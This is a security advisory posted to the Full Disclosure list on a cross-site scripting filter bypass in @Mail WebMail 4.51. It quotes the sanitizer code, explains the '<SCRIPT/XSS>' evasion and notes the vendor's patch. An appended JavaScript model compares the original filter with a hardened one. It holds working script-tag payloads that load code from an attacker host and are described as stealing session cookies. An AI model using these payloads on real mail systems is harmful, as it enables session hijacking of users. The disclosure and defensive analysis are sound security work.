Full Disclosure mailing list archives
[NETRAGARD-20061220 SECURITY ADVISORY] [@Mail WebMail Cross Site Scripting Vulnerability]
From: Netragard Security Advisories <advisories () netragard com>
Date: Thu, 21 Dec 2006 11:46:53 -0500
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

******************** Netragard, L.L.C Advisory* *******************
Strategic Reconnaissance Team
------------------------------------------------
http://www.netragard.com -- "We make I.T. Safe."

[POSTING NOTICE]
- ----------------------------------------------------------------------
If you intend to post this advisory on your web page, please create a
clickable link back to the original Netragard advisory, as the contents
of the advisory may be updated.
<a href=http://www.netragard.com/html/recent_research.html> Netragard Research </a>

[About Netragard]
- ----------------------------------------------------------------------
Netragard is a unique I.T. security company whose services are fortified
by continual vulnerability research and development. This ongoing
research, performed by our Strategic Reconnaissance Team, focuses on
operating systems, software products and web applications commonly used
by businesses internationally. We apply the knowledge gained from this
research to our professional security services, which enables us to
produce high quality deliverables that are the product of talented
security professionals and not of automated scanners and tools. This
advisory is the product of research done by the Strategic Reconnaissance
Team.

[Advisory Information]
- ----------------------------------------------------------------------
Contact               : Adriel T. Desautels
Researcher            : Philippe C. Caturegli
Advisory ID           : NETRAGARD-20061206
Product Name          : @Mail
Product Version       : 4.51
Vendor Name           : Calacode
Type of Vulnerability : XSS with filter evasion technique
Effort                : Easy
- ----------------------------------------------------------------------
Netragard Security Note: Source code obfuscation does not reduce the risk
profile of an application, because it has no impact on the
vulnerabilities that exist within that application.
@Mail's code was obfuscated using basic obfuscation techniques.

[Product Description]
- ----------------------------------------------------------------------
"@Mail is a feature rich Email Solution, providing a complete WebMail
interface for accessing email-resources via a web-browser or wireless
device."
- --http://www.atmail.com--

[Technical Summary]
- ----------------------------------------------------------------------
@Mail does not properly sanitize incoming email. It prepends "DEFANGED_"
to the HTML tags it detects, but its detection misses tags written as
<SCRIPT/XSS>. This failure makes @Mail vulnerable to Cross-site Scripting
("XSS") via filter evasion.

[Technical Details]
- ----------------------------------------------------------------------
@Mail renders HTML emails by default. (Note: we did not find a way to
disable this feature.) Received emails are parsed by the following code,
located in Global.pm, which disarms basic XSS attacks.

- -------8<------- SNIP Global.pm line 626 -> 635 SNIP -------8<-------
my ( $I1I11I11I11IIIII, $I1I111I1111II1II );
$_ = $I1111II1II1II1II->II1II1I11IIII111($I1I1II1II1I11II1);
if (/</) {
    s/<(META|APP|SCRIPT|OBJECT|EMBED|FRAME|IFRAME|BASE|BODY)(\s|>)/<DEFANGED_$1$2/gi;
    s/On(Abort|Blur|Change|Click|DblClick|DragDrop|Error|Focus|KeyDown|KeyPress|KeyUp|Load|MouseDown|MouseMove|MouseOut|MouseOver|MouseUp|Move|Reset|Resize|Select|Submit|Unload)/DEFANGED_On$1/gi;
}
if (/["\047][^"\047\s]*&#x?[1-9][0-9a-f]/i) {
    while ( /["\047][^"\047\s]*&#((4[6-9]|5[0-8]|6[4-9]|[78][0-9]|9[07-9]|1[0-1][0-9]|12[0-2]))/ ) {
        $I1I111I1111II1II = chr($1);
        s/&#$1;?/$I1I111I1111II1II/g;
    }
    while ( /["\047][^"\047\s]*&#(x(2[ef]|3[0-9a]|4[0-9a-f]|5[0-9a]|6[1-9a-f]|7[0-9a]))/i ) {
        $I1I111I1111II1II = chr( hex("0$1") );
        s/&#$1;?/$I1I111I1111II1II/gi;
- -------8<------- SNIP Global.pm line 626 -> 635 SNIP -------8<-------

The above code rewrites <SCRIPT> to <DEFANGED_SCRIPT>, but the protection
it provides can be defeated. The first substitution only fires when one of
the listed tag names is followed by "\s" (any whitespace character: space,
tab, \n or \r) or by ">". Browsers are more forgiving: when a browser
tokenizes a start tag, the tag name ends at the first character that cannot
be part of a name (whitespace, "/" or ">"), and whatever follows, up to the
closing ">", is parsed as attribute text. So "<SCRIPT>" is defanged by the
sanitizer, but "<SCRIPT/XSS>" is not, and when "<SCRIPT/XSS>" reaches a
browser it is treated as "<SCRIPT>" with a meaningless "XSS" attribute and
executed. This is a very common filter evasion technique.

The following code will therefore be executed when @Mail WebMail renders
the email:

<SCRIPT/XSS src=//attacker.com/xss.js></SCRIPT>

Note that the email parser also rewrites "http://" URLs into <a href=...>
links, which would break the attack if a full URL were used. A
scheme-relative URL ("//attacker.com/xss.js") avoids that rewrite, and
browsers resolve it against the scheme of the webmail page, so on an HTTP
session it loads http://attacker.com/xss.js (verified in IE and Firefox).
This XSS attack allows the attacker to retrieve the victim's cookie and
impersonate the victim by replacing the session ID in his own cookie
(verified).

[Proof Of Concept]
- ----------------------------------------------------------------------
Send an HTML email to an @Mail user with the following code embedded:

<SCRIPT/XSS src=//www.netragard.com/xss.js></SCRIPT>

*** The code above will display an alert if vulnerable ***

Note: Netragard's Strategic Reconnaissance Team was able to use this issue
to hijack an @Mail user's session.

[Vendor Status]
- ----------------------------------------------------------------------
Vendor notified on 12/06/06
Vendor responded after 2 more notification attempts
Vendor issued a patch.
Vendor Comments (below):
"Just to confirm the first advisory you sent, NETRAGARD-20061206, has
already been fixed and included in the recent @Mail 4.61 patch for
clients."

[Disclaimer]
- ---------------------http://www.netragard.com-------------------------
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to help
the I.T. community protect themselves against a potentially dangerous
security hole. This advisory is not an attempt to solicit business.
<a href="http://www.netragard.com"> http://www.netragard.com </a>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (Darwin)

iD8DBQFFirpEQwbn1P9Iaa0RAgp9AJ9ZmgNbMZVwsnxoCnWPODqlP2s7/gCbBoHK
omIwSA7xolFDZTq8ytPdDiw=
=B9c7
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
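The filter bypass described in the advisory above, as an added example that is not part of the original posting and not @Mail's code. It re-implements in JavaScript the two tag-defanging substitutions quoted from Global.pm (the numeric-entity decoding that follows them in the snippet is not mirrored), places a hardened variant beside them, and models how a browser's HTML tokenizer reads a start-tag name so that the two filters can be judged by what the browser would actually execute. The hardened variant is an assumption about one reasonable fix, not the vendor's 4.61 patch; the host attacker.example and the two sample payloads are constructed for illustration.

```javascript
// Added example (not from the advisory or from @Mail): the DEFANGED_
// filter quoted from Global.pm, a hardened variant, and a minimal model of
// how a browser tokenizes a start tag. Sample payloads are constructed;
// attacker.example is a placeholder host.

const TAG_NAMES = "META|APP|SCRIPT|OBJECT|EMBED|FRAME|IFRAME|BASE|BODY";
const HANDLERS =
  "Abort|Blur|Change|Click|DblClick|DragDrop|Error|Focus|KeyDown|KeyPress|" +
  "KeyUp|Load|MouseDown|MouseMove|MouseOut|MouseOver|MouseUp|Move|Reset|" +
  "Resize|Select|Submit|Unload";

// Mirrors the two s/// operations in the snippet: a listed tag name is
// defanged only when it is followed by whitespace (\s) or '>', and on*
// handler names are prefixed wherever they occur.
function defangOriginal(html) {
  if (!html.includes("<")) return html;
  return html
    .replace(new RegExp(`<(${TAG_NAMES})(\\s|>)`, "gi"), "<DEFANGED_$1$2")
    .replace(new RegExp(`On(${HANDLERS})`, "gi"), "DEFANGED_On$1");
}

// Hardened variant (assumption: one reasonable fix, not the vendor's patch):
// defang as soon as the tag name is complete, i.e. whenever the next
// character is not a letter or digit, so '/', '<' or end of input count as
// terminators exactly as they do for the browser.
function defangHardened(html) {
  if (!html.includes("<")) return html;
  return html
    .replace(new RegExp(`<(${TAG_NAMES})(?![A-Za-z0-9])`, "gi"), "<DEFANGED_$1")
    .replace(new RegExp(`On(${HANDLERS})`, "gi"), "DEFANGED_On$1");
}

// Minimal model of the HTML tokenizer's "tag name" state: a start-tag name
// ends at the first whitespace, '/' or '>', and the rest of the tag is read
// as attribute text. Returns the lower-cased start-tag names a browser would
// see; end tags such as </SCRIPT> are skipped.
function startTagNamesAsBrowserSees(html) {
  const names = [];
  const re = /<([A-Za-z][^\s\/>]*)/g;
  let m;
  while ((m = re.exec(html)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// True when a <script> start tag survives the given filter, i.e. when the
// browser would still execute it after sanitization.
function scriptSurvives(filter, html) {
  return startTagNamesAsBrowserSees(filter(html)).includes("script");
}

// Constructed payloads: the plain form the filter catches, and the evasion
// form from the advisory that it misses.
const PLAIN_PAYLOAD = "<SCRIPT src=//attacker.example/xss.js></SCRIPT>";
const EVASION_PAYLOAD = "<SCRIPT/XSS src=//attacker.example/xss.js></SCRIPT>";

// Demo run: verdict for both payloads under both filters.
for (const [label, payload] of [["plain", PLAIN_PAYLOAD], ["evasion", EVASION_PAYLOAD]]) {
  const verdict = (f) => (scriptSurvives(f, payload) ? "EXECUTES" : "defanged");
  console.log(`${label}: original -> ${verdict(defangOriginal)}, hardened -> ${verdict(defangHardened)}`);
}
```

The point the model makes explicit is the mismatch between the two parsers: the Perl filter decides a tag name has ended only on `\s` or `>`, while the browser also ends it on `/`, so any character the browser treats as a terminator but the filter does not is a bypass. The hardened regex closes that gap by keying on "next character is not a name character" rather than on a fixed list of terminators; a denylist of tag names still leaves the usual problem that anything not listed passes through, so a real fix would whitelist tags and attributes instead.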